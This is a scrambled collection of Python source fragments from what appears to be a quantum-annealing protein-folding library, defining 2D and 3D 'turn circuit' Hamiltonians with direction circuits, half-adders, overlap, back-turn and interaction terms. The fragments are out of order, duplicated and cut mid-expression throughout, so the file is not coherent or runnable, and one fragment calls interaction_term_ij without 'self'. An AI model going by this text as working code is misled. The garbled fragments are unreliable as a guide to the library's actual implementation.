a_y(self, i, j):", "for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "= np.zeros(n_layers) # lazy way to keep track of half-adders sum_string = list(reversed(sum_string))", "in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] *", "= len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return", "the expression and methods of a protein hamiltonian of the \"turn circuit encoding\"", "self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "copy import deepcopy from itertools import chain from functools import reduce from .qlogic", "0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True", "direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k):", "k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else:", "for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the", "3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "for t in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([", "y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit =", "k][r]) for r in range(maximum)]) for k in ['y', 'z']]) return prefactor *", "x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements", "'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') }", "expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def", "return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r])", "sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r", "i, j): \"\"\"Computes the overlap term for residues i and j.\"\"\" maximum =", "'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r])", "'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0", "j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand(", "class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and", "r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1,", "the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit", "import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self,", "se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the", "def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3):", "def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "j, k)] def back_term(self): \"\"\"Ensures that the chain does not go back on", "\\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r])", "= { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j,", "direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k):", "k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def", "qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for", "the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j):", "on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r", "self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "\\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1,", "list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator", "'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r])", "maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", "+ \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self,", "p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] *", "the direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j,", "k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000 and", "direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns", "1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum", "( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)])", "0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r])", "1 if the chain moves in the direction x+.\"\"\" return q_i * q_j", "\"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat =", "list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j,", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "-1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i,", "import chain from functools import reduce from .qlogic import * from proteinham.core.hamiltonian import", "= True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a", "% 2 == 0: iterator = range(0, t+1, 2) if t > 0", "a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum =", "self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i, 1+i+2*j) return expr", "'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else", "in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i,", "[self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers", "track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "and methods of a protein hamiltonian of the \"turn circuit encoding\" form, described", "== 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)])", "def dim(self): return 2 def pointer(self, i): \"\"\"Points to the start of the", "\\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in", "* (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i >", "self.overlap(i, j) for j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self,", "that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2))", "that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j", "range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\", "+ sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1,", "for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([", "return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "import numpy as np import sympy as sp import symengine as se from", "== 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1", "expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if", "nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j,", "range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures", "n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to keep track of", "chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements", "(1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j))", "prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers)", "# lazy way to keep track of half-adders sum_string = list(reversed(sum_string)) for t", "k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ *", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "== 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k", "self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property", "in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h]", "sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ +", "self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) +", "raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way", "circuit that returns 1 if the chain moves in the direction y-.\"\"\" return", "def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x", "\"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j", "k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif", "+ sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1,", "ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to", "np import sympy as sp import symengine as se from abc import *", "for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] )", "return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def", "t > 1 else [1] for h in iterator: if self.ss_fmat == 'babej':", "+ \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between", "return (1-q_i) * q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the", "range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for", "* qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2],", "sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j]", "= ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def", "sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ *", "(1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0])", "sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ *", "(1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue", "the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "in the direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i,", "j-i-1 counter = np.zeros(n_layers) # lazy way to keep track of half-adders sum_string", "\\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)),", "returns 1 if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def", "circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k)", "j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum =", "k][r]) for r in range(maximum)]) for k in ['x', 'y']]) return prefactor *", "* qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1],", "\\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([", "for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in", "self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 *", "== 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "i-j != 0 else 0 if (j-i) % 2 != 0 or maximum", "as se from abc import * from tqdm import tqdm, trange from copy", "k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif", "qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\", "k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in", "j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if", "+ \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that", "j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\", "if t > 1 else [1] for h in iterator: if self.ss_fmat ==", "self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return", "* \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in", "self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings", "that returns 1 if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j", "self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term()", "else 0 if (j-i) % 2 != 0 or maximum < 2: return", "counter = np.zeros(n_layers) # lazy way to keep track of half-adders sum_string =", "chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def", "sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "the sum string.\"\"\" if i > j: raise ValueError(\"i > j\") if (i,", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)),", "chain moves in the direction y-.\"\"\" return q_i * q_j * (1-q_k) def", "chain moves in the direction x+.\"\"\" return q_i * q_j * q_k def", "'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0", "q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] =", "{:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to keep track", "that the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a", "['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r],", "* q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between", "the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j,", "range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i,", "k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ *", "sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ +", "the start of the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self,", "def pointer(self, i): \"\"\"Points to the start of the string describing the ith", "turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "= int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) % 2 !=", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)),", "b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for", "* qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2],", "maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 *", "[qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain", "j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self,", "the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in", "[self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-': sum_string", "if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)])", "self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\"", "circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points to the start", "returns 1 if the chain moves in the direction y-.\"\"\" return q_i *", "\"\"\"Implements the term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([", "prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\", "def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i > j:", "j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts", "that returns 1 if the chain moves in the direction x-.\"\"\" return q_i", "i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0:", "sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does", "pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian of the", "int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) % 2 != 0", "\"\"\"Encapsulates the expression and methods of a protein hamiltonian of the \"turn circuit", "q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "[0] else: iterator = range(1, t+1, 2) if t > 1 else [1]", "in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i,", "j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "\\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([", "'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum ==", "(j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring =", "i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'),", "return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "i in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j,", "0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor *", "0 if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0)", "r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1,", "prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms =", "a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)]", "moves in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self,", "\\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the", "if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "= [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures", "q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain moves in", "for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ *", "p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ *", "1 if the chain moves in the direction z-.\"\"\" return (1-q_i) * q_j", "qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in", "range(maximum)]) for k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0])", "of the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j,", "[qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain", "1 if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self,", "z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, 